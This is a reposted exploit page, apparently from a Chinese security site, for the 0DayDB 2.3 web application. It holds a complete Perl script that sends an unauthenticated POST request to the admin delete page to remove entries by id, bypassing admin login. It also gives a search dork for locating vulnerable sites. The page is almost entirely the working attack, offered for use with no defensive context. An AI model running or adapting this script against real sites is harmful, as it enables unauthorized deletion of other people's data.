0DayDB 2.3 (delete id) Remote Admin Bypass Exploit
|
来源:Gr33tz-Team.org 作者:Pr0metheuS 发布时间:2008-01-14
|
|
#!/usr/bin/perl #Autor : Pr0metheuS #Script : 0DayDB v2.3 #Version : v2.3 #Dork : "Powered By 0DayDB v2.3" #Gr33tz-Team.org use LWP::UserAgent; if(@ARGV!=3){ print "*****************\n"; print "0DayDB v2.3 Remote Admin Bypass\n"; print "perl $0 <site> <path> <id>\n"; print "downloads ID for delete\n"; print "*****************\n"; } ($site,$path,$id)=@ARGV; sub pri { print "*****************\n"; print "[+] Exploit completed\n"; print "*****************"; } sub con { $ua = new LWP::UserAgent; $ua->agent("Mozilla/8.0"); $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(POST => "".$site."".$path."/acp/delete.php"); $req->content_type('application/x-www-form-urlencoded'); $req->content("id=".$id.""); $res = $ua->request($req); if ($res->is_success) { pri(); } } con();
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|